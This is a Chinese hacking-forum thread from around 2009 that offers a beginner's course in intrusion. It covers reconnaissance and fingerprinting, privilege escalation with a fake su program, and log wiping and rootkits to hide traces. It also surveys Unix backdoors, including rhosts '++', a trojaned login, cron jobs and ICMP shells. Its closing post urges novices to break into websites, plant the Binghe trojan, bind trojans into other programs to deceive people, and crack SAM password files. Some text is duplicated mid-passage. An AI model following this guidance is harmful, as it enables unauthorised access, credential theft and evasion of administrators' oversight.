2011年最新黑客技术11.可以成为黑客的必读

2010年基本技能1楼黑客初级技术讲解（上）2楼黑客初级技术讲解（中）3楼黑客初级技术讲解（下）4楼基础知识（上）5楼基础知识（中）6楼基础知识（下）7楼黑客常用兵器之木马篇（上）8楼黑客常用兵器之木马篇（下）9楼客常常用兵器之扫面篇（上）10楼黑客常用兵器之扫描篇（下）11楼代理、肉鸡、跳板的概念12楼网络监听概念13楼系统进程信息14楼端口全解析（上）15楼端口详细说明表（上）16楼端口详细说明表（中）17楼端口详细说明表（下）18楼端口详细说明表（下）19楼org菜鸟进阶（1）20楼菜鸟进阶（2）21楼菜鸟进阶（9）28楼org术语表（1）29楼org术语表（5）33楼个人电脑安全34楼网络安全知识（1）35楼网络安全知识（6）41楼防范非系统用户破坏42楼黑客扫描特征及易受攻击的端口43楼PING命令及使用技巧44楼GHOST详细解说（1）45楼GHOST详细解说（3）47楼ipc$详细解说大全（1）48楼ipc$详细解说大全（2）49楼常见ASP脚本攻击及防范技巧50楼37秒迅速破解网吧51楼开启3389的5种方法（上）52楼开启3389的5种方法（下）53楼DOS攻击原理及方法介绍54楼如何突破各种防火墙55楼蠕虫技术（上）56楼蠕虫技术（下）58楼壳（上）59楼壳（下）60楼简单黑客工具使用61楼永远的后门62楼入门者如何获得肉鸡63楼流光的使用方法64楼溢出专集65楼NETSTART可以起用命令一览表66楼PHP注入实例67楼一个黑客的基本技能１、黑客的精神态度是很重要的，但技术则更是重要。黑客的态度虽然是无可取代，随著新科技的发明和旧技术的取代,这些工具随时间在慢慢的改变。例如:以往总是会学会用机器码写程序，直到最近我们开始使用HTML。不过，在1996年末,当然，这是基础的hacking技能。在1997年，理所当然的，你必须学会C。但,如果你只是学一种语言，那么你不能算是一位黑客，了不起只能算是一个programmer。除此,你还必须学会学会以独立于任何程序语言之上的概括性观念来思考一件程序设计上的问题。要成为一位真正的黑客，你必须要能在几天之内将manual内容和你目前己经知道的关连起学会一种新的语言。也就是说，你必会学还了C之外的东西，你至少还要会LISP或Perl(Java也正在努力的挤上这个名单;译者注:我很怀疑这份名单)。除了几个重要的hacking常用语言之外，这些语言提供你一些不同的程序设计途径，并且让你在好的方法中学习。程序设计是一种复杂的技术，我没辨法在这提供完整的学习步骤。但是我能告诉你一些在书本上和课堂上所没有的东西(有很多，几乎全部最好的黑客们都是自习而来的)。(a)读别人的程序码；(写程序，这两项是不错的方法。学习写程序就像在学习写一种良好的自然语言，最好的方法是去看一些专家们所写的东西，然后写一些你自己的东西，然后读更多，再写更多。然后一直持续，一直到你发展出一种属于自己的风格和特色。要找到好的程序码来看是很一件很困难的事，因为，对菜鸟黑客们而言，适于供他们阅读和努力的大型程序的source数量很少。但这事己有了戏剧性的变化了;现在免费的供应的软件、程序设计工具和操作系统(大都公开提供source，而且全都是由黑客们写成的)到处可看。进入下一个主题。２、取得一个免费的UNIX，并学习使用和维护。我先假设你己经有一部个人电脑或者是可以使用任何一部(现在的小孩子真幸福，可如此轻易的拥有:-))。取得黑客技巧的第一个步骤是取得一份Linux或者一份免费的BSD-Unix，并将它安装在自己的机器，并使之顺利的运作。没错，在这个世界上除了Unix之外，还有其它的操作系统。但是他们只提供bianry，你不能看到他们的程序码，你也不能修改他们。想要在DOS或Windows或MacOS开始hacking，无疑就是要你绑著枷锁跳舞一样。除此之外，Unix是Internet上的操作系统。当你在不懂Unix的情况下学习使用Internet时，你没辨法在不懂Unix的情况下成为Internet的黑客。因为这个原故，现在的黑客文化还是很牢固的以Unix为中心。(这并不完全是正确的，而且有些活在旧时代的黑客甚至也不喜欢这种情形，但是Unix和Internet之间的共生共成己经到了牢不可破的地步，即使是Microsoft的大块肌肉也没能在上面留下明显的伤痕。)因些，把Unix装起来吧!(我自己是喜欢Linux，但是还有其它的东东可用。)学习它，让它运作起来，让它陪你努力精进。用他向整个Internet喊话。看程序码，改程序。有一天你成为一位高竿的黑客，你回头往后看时会发现，你得到比Microsoft操作系统所能提供的还要好的程序设计工具(包括C，Lisp和Perl)。而且得到快乐，并学到比共生共成己经到了牢不可破的地步，即使是Microsoft的大块肌肉也没能在上面留下明显的伤痕。)因些，把Unix装起来吧!(我自己是喜欢Linux，但是还有其它的东东可用。)学习它，让它运作起来，让它陪你努力精进。用他向整个Internet喊话。看程序码，改程序。有一天你成为一位高竿的黑客，你回头往后看时会发现，你得到比Microsoft操作系统所能提供的还要好的程序设计工具(包括C，Lisp和Perl)。而且得到快乐，并学到比你想像中的还要多的知识。关于学习Unix，在Loginataka有更多的资料。(/~esr/faqs/loginataka。)看一下Linuxdistribution的目录或LinuxCD，并把自己交付给它。3、学习使用WorldWideWeb并学会写HTML。在黑客文化创造出来的东西，大多在他们的活动范围外被使用著，如,在工厂和辨公室或大学被漠漠的使用著。但Web是一个很大的例外，这个黑客眼中的大玩具甚至还被政客们接受，并巧巧的在改变这个世界。因此(还有很多好的理由)，你必须学习Web。并不只是学习使用browser(这太容易了)而己，还要学会写HTML这个Web的标签语言。如果你不知道如何设计程序，写HTML也可以给一些习惯上的帮助。嗯!!建立homepage吧!不过，有一个homepage并没任何特别之处能让你成为一位黑客。Web上到处都是homepage，而且大部份都没什么重点，没什么内容的烂泥--很好看的烂泥巴，但是看起来都一样，差不多。4、至少学会以下的其中两种：一、网站服务器程序ASP、PHP、CGI、jsP我个人认为CGI是最难学的其中一种。二、程序语言：C语言、C++、VB、JAVA、PERL、DELPHI、汇编语言不过我认为C语言的通用性最好，可以跨平台（操作系统）使用。还要试着自己写程序、开发软件等工作。三、数据库管理软件：MYSQL、SQL、FOXPRO……等。四、几种常用的操作系统：WIN98、WIN2000、WINNT、WINXP、UNIX、LINUX、要是能学到UNIX那是最好不过的了。最最基本的WIN2K、WINNT也要学会吧。如果以上的你都会了，那么你已经是个高手了。黑客初级技术讲解（上）网络安全从其本质上来讲就是网络上的信息安全。从广义来说，凡是涉及到网络上信息的保密性、完整性、可用性、真实性和可控性的相关技术和理论都是网络安全的研究领域。确保网络系统的信息安全是网络安全的目标，信息安全包括两个方面：信息的存储安全和信息的传输安全。信息的存储安全是指信息在静态存放状态下的安全，如是否会被非授权调用等。信息的传输安全是指信息在动态传输过程中安全。为了确保网络信息的传输安全，有以下几个问题：（１）对网络上信息的监听（２）对用户身份的仿冒（３）对网络上信息的篡改（４）对发出的信息予以否认（５）对信息进行重发对于一般的常用入侵方法主要有1.口令入侵所谓口令入侵，就是指用一些软件解开已经得到但被人加密的口令文档，不过许多黑客已大量采用一种可以绕开或屏蔽口令保护的程序来完成这项工作。对于那些可以解开或屏蔽口令保护的程序通常被称为“Crack”。由于这些软件的广为流传，使得入侵电脑网络系统有时变得相当简单，一般不需要很深入了解系统的内部结构，是初学者的好方法。2.特洛伊木马术说到特洛伊木马，只要知道这个故事的人就不难理解，它最典型的做法可能就是把一个能帮助黑客完成某一特定动作的程序依附在某一合法用户的正常程序中，这时合法用户的程序代码已被该变。一旦用户触发该程序，那么依附在内的黑客指令代码同时被激活，这些代码往往能完成黑客指定的任务。由于这种入侵法需要黑客有很好的编程经验，且要更改代码、要一定的权限，所以较难掌握。但正因为它的复杂性，一般的系统管理员很难发现。3.监听法这是一个很实用但风险也很大的黑客入侵方法，但还是有很多入侵系统的黑客采用此类方法，正所谓艺高人胆大。网络节点或工作站之间的交流是通过信息流的转送得以实现，而当在一个没有集线器的网络中，数据的传输并没有指明特定的方向，这时每一个网络节点或工作站都是一个接口。这就好比某一节点说：“嗨！你们中有谁是我要发信息的工作站。”此时，所有的系统接口都收到了这个信息，一旦某个工作站说：“嗨！那是我，请把数据传过来。”联接就马上完成。目前有网络上流传着很多嗅探软件，利用这些软件就可以很简单的监听到数据，甚至就包含口令文件，有的服务在传输文件中直接使用明文传输，这也是非常危险的4.E-mail技术使用email加木马程序这是黑客经常使用的一种手段，而且非常奏效，一般的用户，甚至是网管，对网络安全的意识太过于淡薄，这就给很多黑客以可乘之机。5.病毒技术作为一个黑客，如此使用应该是一件可耻的事情，不过大家可以学习，毕竟也是一种攻击的办法，特殊时间，特殊地点完全可以使用。6.隐藏技术网络攻击的一般步骤及实例攻击的准备阶段首先需要说明的是，入侵者的来源有两种，一种是内部人员利用自己的工作机会和权限来获取不应该获取的权限而进行的攻击。另一种是外部人员入侵，包括远程入侵、网络节点接入入侵等。本节主要讨论远程攻击。进行网络攻击是一件系统性很强的工作，其主要工作流程是：收集情报，远程攻击，远程登录，取得普通用户的权限，取得超级用户的权限，留下后门，清除日志。主要内容包括目标分析，文档获取，破解密码，日志清除等技术，下面分别介绍。1.确定攻击的目的攻击者在进行一次完整的攻击之前首先要确定攻击要达到什么样的目的，即给对方造成什么样的后果。常见的攻击目的有破坏型和入侵型两种。破坏型攻击指的只是破坏攻击目标，使其不能正常工作，而不能随意控制目标的系统的运行。要达到破坏型攻击的目的，主要的手段是拒绝服务攻击（DenialOfService）。另一类常见的攻击目的是入侵攻击目标，这种攻击是要获得一定的权限来达到控制攻击目标的目的。应该说这种攻击比破坏型攻击更为普遍，威胁性也更大。因为黑客一旦获取攻击目标的管理员权限就可以对此服务器做任意动作，包括破坏性的攻击。此类攻击一般也是利用服务器操作系统、应用软件或者网络协议存在的漏洞进行的。当然还有另一种造成此种攻击的原因就是密码泄露，攻击者靠猜测或者穷举法来得到服务器用户的密码，然后就可以用和真正的管理员一样对服务器进行访问。2.信息收集除了确定攻击目的之外，攻击前的最主要工作就是收集尽量多的关于攻击目标的信息。这些信息主要包括目标的操作系统类型及版本，目标提供哪些服务，各服务器程序的类型与版本以及相关的社会信息。要攻击一台机器，首先要确定它上面正在运行的操作系统是什么，因为对于不同类型的操作系统，其上的系统漏洞有很大区别，所以攻击的方法也完全不同，甚至同一种操作系统的不同版本的系统漏洞也是不一样的。要确定一台服务器的操作系统一般是靠经验，有些服务器的某些服务显示信息会泄露其操作系统。例如当我们通过TELNET连上一台机器时，如果显示Unix（r）SystemVRelease4．0login：那么根据经验就可以确定这个机器上运行的操作系统为SUNOS5．5或5．5．l。但这样确定操作系统类型是不准确的，因为有些网站管理员为了迷惑攻击者会故意更改显示信息，造成假象。还有一种不是很有效的方法，诸如查询DNS的主机信息（不是很可靠）来看登记域名时的申请机器类型和操作系统类型，或者使用社会工程学的方法来获得，以及利用某些主机开放的SNMP的公共组来查询。另外一种相对比较准确的方法是利用网络操作系统里的TCP/IP堆栈作为特殊的“指纹”来确定系统的真正身份。因为不同的操作系统在网络底层协议的各种实现细节上略有不同。可以通过远程向目标发送特殊的包，然后通过返回的包来确定操作系统类型。例如通过向目标机发送一个FIN的包（或者是任何没有ACK或SYN标记的包）到目标主机的一个开放的端口然后等待回应。许多系统如windows、BSDI、CISCO、HP／UX和IRIX会返回一个RESET。通过发送一个SYN包，它含有没有定义的TCP标记的TCP头。那么在Linux系统的回应包就会包含这个没有定义的标记，而在一些别的系统则会在收到SYN+BOGU包之后关闭连接。或是利用寻找初始化序列长度模板与特定的操作系统相匹配的方法。利用它可以对许多系统分类，如较早的Unix系统是64K长度，一些新的Unix系统的长度则是随机增长。还有就是检查返回包里包含的窗口长度，这项技术根据各个操作系统的不同的初始化窗口大小来唯一确定它们。利用这种技术实现的工具很多，比较著名的有NMAP、CHECKOS、QUESO等。获知目标提供哪些服务及各服务daemon的类型、版本同样非常重要，因为已知的漏洞一般都是对某一服务的。这里说的提供服务就是指通常我们提到的喘口，例如一般TELNET在23端口，FTP在对21端口，WWW在80端口或8080端口，这只是一般情况，网站管理完全可以按自己的意愿修改服务所监听的端口号。在不同服务器上提供同一种服务的软件也可以是不同，我们管这种软件叫做daemon，例如同样是提供FTP服务，可以使用wuftp、proftp，ncftp等许多不同种类的daemon。确定daemon的类型版本也有助于黑客利用系统漏洞攻破网站。另外需要获得的关于系统的信息就是一些与计算机本身没有关系的社会信息，例如网站所属公司的名称、规模，网络管理员的生活习惯、电话号码等。这些信息看起来与攻击一个网站没有关系，实际上很多黑客都是利用了这类信息攻破网站的。例如有些网站管理员用自己的电话号码做系统密码，如果掌握了该电话号码，就等于掌握了管理员权限进行信息收集可以用手工进行，也可以利用工具来完成，完成信息收集的工具叫做扫描器。用扫描器收集信息的优点是速度快，可以一次对多个目标进行扫描。攻击的实施阶段1.获得权限当收集到足够的信息之后，攻击者就要开始实施攻击行动了。作为破坏性攻击，只需利用工具发动攻击即可。而作为入侵性攻击，往往要利用收集到的信息，找到其系统漏洞，然后利用该漏洞获取一定的权限。有时获得了一般用户的权限就足以达到修改主页等目的了，但作为一次完整的攻击是要获得系统最高权限的，这不仅是为了达到一定的目的，更重要的是证明攻击者的能力，这也符合黑客的追求。能够被攻击者所利用的漏洞不仅包括系统软件设计上的安全漏洞，也包括由于管理配置不当而造成的漏洞。前不久，因特网上应用最普及的著名www服务器提供商Apache的主页被黑客攻破，其主页面上的PoweredbyApache图样（羽毛状的图画）被改成了PoweredbyMicrosoftBackoffice的图样，那个攻击者就是利用了管理员对Webserver用数据库的一些不当配置而成功取得最高权限的。1评分次数*精品文章??水晶+20枚梵天回复引用TOPkamil*发短消息*加为好友kamil当前离线帖子2238?精华2?声望169?人民币0元?水晶2468枚?阅读权限150?在线时间211小时?注册时间2008-6-1?最后登录2009-5-25?超级版主帖子2238?精华2?声望169?人民币0元?水晶2468枚?阅读权限150?在线时间211小时?注册时间2008-6-1?最后登录2009-5-25?3#发表于2009-1-2818:49|只看该作者****网站建设，虚拟空间，域名注册****黑客初级技术讲解（中）当然大多数攻击成功的范例还是利用了系统软件本身的漏洞。造成软件漏洞的主要原因在于编制该软件的程序员缺乏安全意识。当攻击者对软件进行非正常的调用请求时造成缓冲区溢出或者对文件的非法访问。其中利用缓冲区溢出进行的攻击最为普遍，据统计80％以上成功的攻击都是利用了缓冲区溢出漏洞来获得非法权限的。关于缓冲区溢出在后面用专门章节来作详细解释。无论作为一个黑客还是一个网络管理员，都需要掌握尽量多的系统漏洞。黑客需要用它来完成攻击，而管理员需要根据不同的漏洞来进行不同的防御措施。了解最新最多的漏洞信息，可以到诸如Rootshell（www.rootshell．com）、Packetstorm（packetstorm．securify．com）、Securityfocus（www.securityfocus．com）等网站去查找。2.权限的扩大系统漏洞分为远程漏洞和本地漏洞两种，远程漏洞是指黑客可以在别的机器上直接利用该漏洞进行攻击并获取一定的权限。这种漏洞的威胁性相当大，黑客的攻击一般都是从远程漏洞开始的。但是利用远程漏洞获取的不一定是最高权限，而往往只是一个普通用户的权限，这样常常没有办法做黑客们想要做的事。这时就需要配合本地漏洞来把获得的权限进行扩大，常常是扩大至系统的管理员权限。只有获得了最高的管理员权限之后，才可以做诸如网络监听、打扫痕迹之类的事情。要完成权限的扩大，不但可以利用已获得的权限在系统上执行利用本地漏洞的程序，还可以放一些木马之类的欺骗程序来套取管理员密码，这种木马是放在本地套取最高权限用的，而不能进行远程控制。例如一个黑客已经在一台机器上获得了一个普通用户的账号和登录权限，那么他就可以在这台机器上放置一个假的su程序。一旦黑客放置了假su程序，当真正的合法用户登录时，运行了su，并输入了密码，这时root密码就会被记录下来，下次黑客再登录时就可以使用su变成root了。攻击的善后工作1.日志系统简介如果攻击者完成攻击后就立刻离开系统而不做任何善后工作，那么他的行踪将很快被系统管理员发现，因为所有的网络操作系统一般都提供日志记录功能，会把系统上发生的动作记录下来。所以，为了自身的隐蔽性，黑客一般都会抹掉自己在日志中留下的痕迹。想要了解黑客抹掉痕迹的方法，首先要了解常见的操作系统的日志结构以及工作方式。Unix的日志文件通常放在下面这几个位置，根据操作系统的不同略有变化／usr／adm——早期版本的Unix。／Var／adm新一点的版本使用这个位置。／Varflort一些版本的Solaris、LinuxBSD、FreeBSD使用这个位置。／etc，大多数Unix版本把Utmp放在此处，一些Unix版本也把Wtmp放在这里，这也是Syslog．conf的位置。下面的文件可能会根据你所在的目录不同而不同：acct或pacct－一记录每个用户使用的命令记录。accesslog主要用来服务器运行了NCSAHTTP服务器，这个记录文件会记录有什么站点连接过你的服务器。aculo保存拨出去的Modems记录。lastlog记录了最近的Login记录和每个用户的最初目的地，有时是最后不成功Login的记录。loginlog一记录一些不正常的L0gin记录。messages——记录输出到系统控制台的记录，另外的信息由Syslog来生成security记录一些使用UUCP系统企图进入限制范围的事例。sulog记录使用su命令的记录。utmp记录当前登录到系统中的所有用户，这个文件伴随着用户进入和离开系统而不断变化。Utmpx，utmp的扩展。wtmp记录用户登录和退出事件。Syslog最重要的日志文件，使用syslogd守护程序来获得。2.隐藏踪迹攻击者在获得系统最高管理员权限之后就可以随意修改系统上的文件了（只对常规Unix系统而言），包括日志文件，所以一般黑客想要隐藏自己的踪迹的话，就会对日志进行修改。最简单的方法当然就是删除日志文件了，但这样做虽然避免了系统管理员根据IP追踪到自己，但也明确无误地告诉了管理员，系统己经被人侵了。所以最常用的办法是只对日志文件中有关自己的那一部分做修改。关于修改方法的具体细节根据不同的操作系统有所区别，网络上有许多此类功能的程序，例如zap、wipe等，其主要做法就是清除utmp、wtmp、Lastlog和Pacct等日志文件中某一用户的信息，使得当使用w、who、last等命令查看日志文件时，隐藏掉此用户的信息。管理员想要避免日志系统被黑客修改，应该采取一定的措施，例如用打印机实时记录网络日志信息。但这样做也有弊端，黑客一旦了解到你的做法就会不停地向日志里写入无用的信息，使得打印机不停地打印日志，直到所有的纸用光为止。所以比较好的避免日志被修改的办法是把所有日志文件发送到一台比较安全的主机上，即使用loghost。即使是这样也不能完全避免日志被修改的可能性，因为黑客既然能攻入这台主机，也很可能攻入loghost。只修改日志是不够的，因为百密必有一漏，即使自认为修改了所有的日志，仍然会留下一些蛛丝马迹的。例如安装了某些后门程序，运行后也可能被管理员发现。所以，黑客高手可以通过替换一些系统程序的方法来进一步隐藏踪迹。这种用来替换正常系统程序的黑客程序叫做rootkit，这类程序在一些黑客网站可以找到，比较常见的有LinuxRootKit，现在已经发展到了5.0版本了。它可以替换系统的ls、ps、netstat、inetd等等一系列重要的系统程序，当替换了ls后，就可以隐藏指定的文件，使得管理员在使用ls命令时无法看到这些文件，从而达到隐藏自己的目的。3.后门一般黑客都会在攻入系统后不只一次地进入该系统。为了下次再进入系统时方便一点，黑客会留下一个后门，特洛伊木马就是后门的最好范例。Unix中留后门的方法有很多种，下面介绍几种常见的后门，供网络管理员参考防范。<1>密码破解后门这是入侵者使用的最早也是最老的方法，它不仅可以获得对Unix机器的访问，而且可以通过破解密码制造后门。这就是破解口令薄弱的帐号。以后即使管理员封了入侵者的当前帐号，这些新的帐号仍然可能是重新侵入的后门。多数情况下，入侵者寻找口令薄弱的未使用帐号，然后将口令改的难些。当管理员寻找口令薄弱的帐号是，也不会发现这些密码已修改的帐号。因而管理员很难确定查封哪个帐号。<2>Rhosts++后门在连网的Unix机器中，象Rsh和Rlogin这样的服务是基于rhosts文件里的主机名使用简单的认证方法。用户可以轻易的改变设置而不需口令就能进入。入侵者只要向可以访问的某用户的rhosts文件中输入"++"，就可以允许任何人从任何地方无须口令便能进入这个帐号。特别当home目录通过NFS向外共享时，入侵者更热中于此。这些帐号也成了入侵者再次侵入的后门。许多人更喜欢使用Rsh，因为它通常缺少日志能力.许多管理员经常检查"++"，所以入侵者实际上多设置来自网上的另一个帐号的主机名和用户名，从而不易被发现。<3>校验和及时间戳后门早期，许多入侵者用自己的trojan程序替代二进制文件。系统管理员便依靠时间戳和系统校验和的程序辨别一个二进制文件是否已被改变，如Unix里的sum程序。入侵者又发展了使trojan文件和原文件时间戳同步的新技术。它是这样实现的:先将系统时钟拨回到原文件时间，然后调整trojan文件的时间为系统时间。一旦二进制trojan文件与原来的精确同步，就可以把系统时间设回当前时间。Sum程序是基于CRC校验，很容易骗过。入侵者设计出了可以将trojan的校验和调整到原文件的校验和的程序。MD5是被大多数人推荐的，MD5使用的算法目前还没人能骗过。回复引用TOPkamil*发短消息*加为好友kamil当前离线帖子2238?精华2?声望169?人民币0元?水晶2468枚?阅读权限150?在线时间211小时?注册时间2008-6-1?最后登录2009-5-25?超级版主帖子2238?精华2?声望169?人民币0元?水晶2468枚?阅读权限150?在线时间211小时?注册时间2008-6-1?最后登录2009-5-25?4#发表于2009-1-2818:50|只看该作者黑客初级技术讲解（下）<4>Login后门在Unix里，login程序通常用来对telnet来的用户进行口令验证.入侵者获取login.c的原代码并修改，使它在比较输入口令与存储口令时先检查后门口令。如果用户敲入后门口令，它将忽视管理员设置的口令让你长驱直入。这将允许入侵者进入任何帐号，甚至是root。由于后门口令是在用户真实登录并被日志记录到utmp和wtmp前产生一个访问的，所以入侵者可以登录获取shell却不会暴露该帐号。管理员注意到这种后门后，便用"strings"命令搜索login程序以寻找文本信息.许多情况下后门口令会原形毕露。入侵者就开始加密或者更好的隐藏口令，使strings命令失效<5>Telnetd后门当用户telnet到系统，监听端口的inetd服务接受连接随后递给in.telnetd，由它运行login.一些入侵者知道管理员会检查login是否被修改，就着手修改in.telnetd.在in.telnetd内部有一些对用户信息的检验，比如用户使用了何种终端.典型的终端设置是Xterm或者VT100.入侵者可以做这样的后门，当终端设置为"letmein"时产生一个不要任何验证的shell.入侵者已对某些服务作了后门，对来自特定源端口的连接产生一个shell。<6>服务后门几乎所有网络服务曾被入侵者作过后门.Finger，rsh，rexec，rlogin，ftp，甚至inetd等等的作了的版本随处多是。有的只是连接到某个TCP端口的shell，通过后门口令就能获取访问。这些程序有时用刺娲□？Ucp这样不用的服务，或者被加入inetd.conf作为一个新的服务，管理员应该非常注意那些服务正在运行，并用MD5对原服务程序做校验。<7>Cronjob后门Unix上的Cronjob可以按时间表调度特定程序的运行。入侵者可以加入后门shell程序使它在1AM到2AM之间运行，那么每晚有一个小时可以获得访问。也可以查看cronjob中经常运行的合法程序，同时置入后门。<8>库后门几乎所有的UNIX系统使用共享库，共享库用于相同函数的重用而减少代码长度。一些入侵者在象crypt.c和_crypt.c这些函数里作了后门；象login.c这样的程序调用了crypt()。当使用后门口令时产生一个shell。因此，即使管理员用MD5检查login程序，仍然能产生一个后门函数，而且许多管理员并不会检查库是否被做了后门。对于许多入侵者来说有一个问题:一些管理员对所有东西多作了MD5校验，有一种办法是入侵者对open()和文件访问函数做后门。后门函数读原文件但执行trojan后门程序。所以当MD5读这些文件时，校验和一切正常，但当系统运行时将执行trojan版本的，即使trojan库本身也可躲过MD5校验，对于管理员来说有一种方法可以找到后门，就是静态编连MD5校验程序然后运行，静态连接程序不会使用trojan共享库。<9>内核后门内核是Unix工作的核心，用于库躲过MD5校验的方法同样适用于内核级别，甚至连静态连接多不能识别.一个后门作的很好的内核是最难被管理员查找的，所幸的是内核的后门程序还不是随手可得，每人知道它事实上传播有多广。<10>文件系统后门入侵者需要在服务器上存储他们的掠夺品或数据，并不能被管理员发现，入侵者的文章常是包括exploit脚本工具，后门集，sniffer日志，email的备分，原代码，等等！有时为了防止管理员发现这么大的文件，入侵者需要修补"ls"，"du"，"fsck"以隐匿特定的目录和文件，在很低的级别，入侵者做这样的漏洞:以专有的格式在硬盘上割出一部分，且表示为坏的扇区。因此入侵者只能用特别的工具访问这些隐藏的文件，对于普通的管理员来说，很难发现这些"坏扇区"里的文件系统，而它又确实存在。<11>Boot块后门在PC世界里，许多病毒藏匿与根区，而杀病毒软件就是检查根区是否被改变。Unix下，多数管理员没有检查根区的软件，所以一些入侵者将一些后门留在根区。.所以更多的管理员是用MD5校验和检测这种后门的。<12>隐匿进程后门入侵者通常想隐匿他们运行的程序，这样的程序一般是口令破解程序和监听程序(sniffer)，有许多办法可以实现，这里是较通用的:编写程序时修改自己的argv[]使它看起来象其他进程名。可以将sniffer程序改名类似in.syslog再执行，因此当管理员用"ps"检查运行进程时，出现的是标准服务名。可以修改库函数致使"ps"不能显示所有进程，可以将一个后门或程序嵌入中断驱动程序使它不会在进程表显现。使用这个技术的一个后门例子是amod.tar.gz:http://star.niimm.spb.su/~maillist/bugtraq.1/0777.html网络通行.这些网络通行后门有时允许入侵者通过防火墙进行访问。有许多网络后门程序允许入侵者建立某个端口号并不用通过普通服务就能实现访问.因为这是通过非标准网络端口的通行，管理员可能忽视入侵者的足迹.这种后门通常使用TCP，UDP和ICMP，但也可能是其他类型报文。<14>TCPShell后门入侵者可能在防火墙没有阻塞的高位TCP端口建立这些TCPShell后门.许多情况下，他们用口令进行保护以免管理员连接上后立即看到是shell访问.管理员可以用netstat命令查看当前的连接状态，那些端口在侦听，目前连接的来龙去脉.通常这些后门可以让入侵者躲过TCPWrapper技术.这些后门可以放在SMTP端口，许多防火墙允许e-mail通行的.<15>UDPShell后门管理员经常注意TCP连接并观察其怪异情况，而UDPShell后门没有这样的连接，所以netstat不能显示入侵者的访问痕迹，许多防火墙设置成允许类似DNS的UDP报文的通行，通常入侵者将UDPShell放置在这个端口，允许穿越防火墙。<16>ICMPShell后门Ping是通过发送和接受ICMP包检测机器活动状态的通用办法之一。许多防火墙允许外界ping它内部的机器，入侵者可以放数据入Ping的ICMP包，在ping的机器间形成一个shell通道，管理员也许会注意到Ping包暴风，但除了他查看包内数据，否者入侵者不会暴露。<17>加密连接管理员可能建立一个sniffer试图某个访问的数据，但当入侵者给网络通行后门加密后，就不可能被判定两台机器间的传输内容了。回复引用TOPkamil*发短消息*加为好友kamil当前离线帖子2238?精华2?声望169?人民币0元?水晶2468枚?阅读权限150?在线时间211小时?注册时间2008-6-1?最后登录2009-5-25?超级版主帖子2238?精华2?声望169?人民币0元?水晶2468枚?阅读权限150?在线时间211小时?注册时间2008-6-1?最后登录2009-5-25?5#发表于2009-1-2818:50|只看该作者基础知识（上）我认为这是一套适合初学者由浅到深的文章，所以强烈推荐给大家，作者从基础讲到最近比较火的漏洞，可能有些人看来是浅了些，但是的确很适合想干点啥但又不知道怎么办的菜鸟们。第一节，伸展运动。这节操我们要准备道具，俗话说：“工欲善其事，必先利其器”（是这样吗？哎！文化低……）说得有道理，我们要学习黑客技术，一点必要的工具必不可少。1，一台属于自己的可以上网的电脑。这样你可以有充分的支配权，上网不用说，否则你怎么看到我的文章？wap?呵呵！属于自己很重要，否则安全性是个很大的问题。第一点相信大家没有问题。2，windows2000/nt,别和我说98/me,他们是你们同学用来玩游戏的！（当然，我也是铁杆gamefan)对网络支持极差，命令受限制，很多软件又不能用，对黑客来说使用起来绊手绊脚，非常不利。这里我推荐2000，这是一个很成熟的系统（漏洞还是有一堆）。推荐双系统，这样黑玩搭配，干活不累。3，冰河。中国第一木马，中者数不胜数，国人骄傲。虽然用冰河根本不能算黑客，但它确实能培养你对黑客的兴趣，同时帮助你了解网络，相信很多黑客同学都是这样起步的。静止写的那篇冰河教程很不错，大家仔细看看。而且，以后你学会入侵服务器后，用冰河操作也会减少工作量（我是懒虫，爽！）4，oicq。我们学黑客，可不是学泡mm!bfctx你…………息怒息怒！我们当然是学黑客，但不要忘了，众人拾柴火更高，我们通过cshu的成员列表，互相联系帮助，对提高水平很有帮助！另外我要废话一句：据我了解，现在黑客网站下载最多的都是针对oicq的破解工具，我个人认为很无聊，偷个密码代表什么，浪费时间！最后补充：mm不能不泡。（谁砸我？？！！）5，superscan。很好用的端口扫描器，速度超快，功能一流，一旦拥有，别无所求……（打住！）不论是找木马受害者，还是扫服务器端口，它都非常有效，cshu强烈推荐！6，一本笔记本/便条，网上资料相当多，黑客处理的也是非常之多。良好的习惯决定了你的效率，准备一本笔记本，记录下你的成果，肉鸡，木马利用，命令，密码……坚持一下，你会发现你的效率大幅上升的！7，lc3.著名nt/2000sam破解程序，有时我们拿不到足够权限，又没好办法，那么lc3是最好的解决办法，只要你拿的到sam，你就是服务器它爷爷！本站有其破解程序，支持了暴力破解！8，程序合并。这是玩木马必需的，虽然木马是很低的手段，但有时配合巧办法（以后我会介绍）确实能够达到意想不到的效果，朋友们可以在空闲时玩玩木马，很有趣，若你能巧妙的骗过mm,那么webmaster也可能被你骗倒：〉（比较理想化）9，流光4for2000/nt。可能是世界上最好的综合类黑软！中国的骄傲，它集成了很全的漏洞信息，速度快，方法多，对有漏洞的主机是毁灭性的打击，操作又方便，是快速黑站必不可少的精品工具。超级吐血推荐！！10，良好的心态，稳定的情绪，刻苦钻研的精神，刨根问底的作风，打扫房间的习惯。黑客是门很高深的学问，不要幻想一步登天，失败是常有的事，千万不可灰心。在那么多黑软的包围下，切不可完全依赖他们，一定要了解它们利用什么原理工作。对任何一个小问题，小细节，一定要问清楚，cshu就是给大家互相交流的场所哦！黑完后不要得意忘形，打扫战场也很重要，以防万一。第一节操完，可能很无聊，我就这点水平，大家见谅！这里我说一句大话：做完菜鸟操，包你会黑简单的站（哎哟！心慌了！）下一节操我们要介绍如何掌握一台主机的基本信息，期待中……真是太对不起大家了，隔了那么久才写这篇教程，我这几天实在太忙，大家还是体谅一下我吧，好了，开始做操。今天的内容是获得主机的信息。我们要黑一台主机，首先要了解它的信息，包括它的类型，用户列表，目录，端口，漏洞等等。首先我们我们要找一台主机来练手，随便挑吧！(乱说的)第一部，呵呵，先在ie里看看吧，mmmm做的还行，挺精致的！主要是我们肯定了它现在是正常的。然后，我们应该知道它的ip,很简单，ping它一下就可以了。ping，看看窗口里有了什么？是不是有三行回应，其中的22就是ip了（还是胡说的，一个例子）。有人是不是要问，我这里怎么没有。那可能是两个原因，第一，你打错命令了；第二，该主机装了防火墙，禁止ping,不过这种可能很小。知道了ip，下一步应该确定端口了。下面是一些常用的端口的默认值21--ftp重要哦23--telnet欢呼吧25-smtp尽管重要，但似乎没什么可利用的53--domain同上79--finger可知道用户信息了80--http要看网页，没它不行吧110--pop收信的139--netbios共享用的，很有利用价值哦3389--win2000超级终端呵呵，这个好！其实端口有上千种，这些最最常用我们怎么知道服务器有什么端口打开呢？？去找个扫描器吧，x-scan,superscan,flux等等很多哦。这里我推荐superscan，速度很快，本站也有其教程哦！用法还是比较傻瓜的，估计大家不会有问题，轻轻几点，打开的端口就出现了。不错不错，上面说到的都有（太理想化了吧!）那么我们该如何应对